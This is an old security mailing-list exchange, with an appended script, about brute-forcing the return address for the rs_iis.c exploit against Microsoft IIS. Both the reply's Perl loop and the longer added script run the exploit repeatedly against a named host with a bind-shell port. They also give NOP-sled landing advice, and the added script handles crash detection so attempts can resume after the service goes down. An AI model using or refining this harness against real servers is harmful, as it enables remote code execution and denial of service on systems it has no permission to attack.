RE: Generating Hex Numbers to brute force rs_iis.c
From: Joshua Wright (Joshua.Wright at jwu.edu)
Date: Wed Apr 02 2003 - 09:17:22 CST
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
I'm no perl expert, but this is what I whipped up for a similar test:
#!/usr/bin/perl
$myserver = "pvdnet05";
for ($i = 0; $i < 256; $i++) {
    $retcode = sprintf("%02x", $i);   # zero-pad so every RET argument is a four-digit hex value
    $exec = "./rs_iis $myserver 80 31337 " . $retcode . "04";
    system($exec);
    sleep(1);   # give the target a moment before the next attempt
}
Note that the last byte of the RET address is not terribly
significant, since the NOP sled is ~65K in size and this value only
shifts the landing point by at most 256 bytes.
This didn't work well for me, since IIS will sometimes crash without
a valid RET address, requiring a server restart. I had meant to look
for a way to restart Windows 2000 services from a Linux box with
Samba or similar tool, but got bored with it and started trying to
exploit something else. :)
- -Joshua Wright
Senior Network and Security Architect
Johnson & Wales University
Joshua.Wright at jwu.edu
http://home.jwu.edu/jwright/
pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
> In playing with rs_iis.c (ntdll exploit) in our lab, I've been
> looking for ways to brute force the return address.
>
> I know there's been a shell script (rs_brute.sh) released that
> already does this, but since I've been playing with PERL lately (and
> since this shell script did not exist when I began playing with the
> exploit), I thought I'd take a whack at producing the RET addresses
> (0x0000-0xffff) in a PERL script. I just wanted to get your input and
> see if there is an easier way to do this (using PERL, of course).
> Basically, the goal is as follows:
>
> 1) generate Hex Numbers from 0x0000 to 0xffff in the following
> pattern (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
> 2) pass the output to rs_iis via system() command?
>
> So far, I can generate the output and print it to stdout. Any tips
> on getting the script to run rs_iis once with each address produced
> by the script? Also, is there a way to produce this output without
> creating an array like this?
>
> #!/usr/bin/perl -w
>
> @HexD =
> ('0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f');
>
> for ($i = 0; $i <= 255; $i += 1) {
>     # print the byte twice so the output is 0000, 0101, ..., ffff
>     print "$HexD[int($i / 16)]$HexD[$i % 16]";
>     print "$HexD[int($i / 16)]$HexD[$i % 16]\n";
> }
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.8 for non-commercial use <http://www.pgp.com>
iQA/AwUBPor/AY/i/ArUS0pzEQJ75wCeNFPqMa0+AwwuCcYgb7YwRdt98KsAn2HZ
Il0dIPyWAX6swPIQfg/LvvQk
=hz0W
-----END PGP SIGNATURE-----
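The following is an added example for this thread, not code from either poster and not part of rs_iis. It does what the question asks (the 0x0000, 0x0101, ..., 0xffff pattern without a digit lookup table, one rs_iis run per value) and also handles the failure mode the reply describes: instead of a fixed sleep, it polls the target's web port after each attempt and stops when the service does not come back. Assumptions: rs_iis sits in the current directory and takes "host port shellport ret" in that order, as in the command line in the reply; the host name pvdnet05 is taken from the reply; the DRY_RUN switch and the 120-second timeout are placeholders chosen here.

```perl
#!/usr/bin/perl
# Added example for this thread, not code from either poster or from
# rs_iis itself. Assumptions: rs_iis is in the current directory and takes
# "host port shellport ret" in that order (as in the command line quoted in
# the reply); the host name pvdnet05 and the DRY_RUN switch are placeholders.
use strict;
use warnings;
use IO::Socket::INET;

my $host      = shift(@ARGV) // 'pvdnet05';   # target name from the reply
my $port      = shift(@ARGV) // 80;
my $shellport = shift(@ARGV) // 31337;
my $dry_run   = $ENV{DRY_RUN};                # DRY_RUN=1: print, don't run

# The pattern asked for in the original question (0x0000, 0x0101, ...,
# 0xffff), produced with one sprintf per value: no digit lookup table.
sub ret_candidates {
    return map { sprintf('%02x%02x', $_, $_) } 0 .. 255;
}

# The reply notes that IIS sometimes dies on a bad RET. Rather than a
# fixed sleep, poll the web port and return 1 once a TCP connect succeeds,
# or 0 if it stays down for $timeout seconds.
sub wait_for_port {
    my ($h, $p, $timeout) = @_;
    my $deadline = time + $timeout;
    while (time < $deadline) {
        my $sock = IO::Socket::INET->new(
            PeerAddr => $h, PeerPort => $p, Proto => 'tcp', Timeout => 3,
        );
        if ($sock) { close $sock; return 1; }
        sleep 2;
    }
    return 0;
}

for my $ret (ret_candidates()) {
    # List form of system(): arguments go straight to execve, so nothing
    # here is ever interpreted by a shell.
    my @cmd = ('./rs_iis', $host, $port, $shellport, $ret);
    print "RET $ret: @cmd\n";
    next if $dry_run;

    my $status = system(@cmd);
    printf "  rs_iis exit status %d\n", $status == -1 ? -1 : $status >> 8;

    unless (wait_for_port($host, $port, 120)) {
        print "  $host:$port still down after RET $ret; ",
              "restart IIS and resume from this value\n";
        last;
    }
}
```

Run it with DRY_RUN=1 first to see the exact command lines it would issue; without the switch it stops at the first RET value after which the web port stays closed, so the value to resume from is the last one printed. If your copy of rs_iis expects the return address in a different position or format, change only the @cmd line.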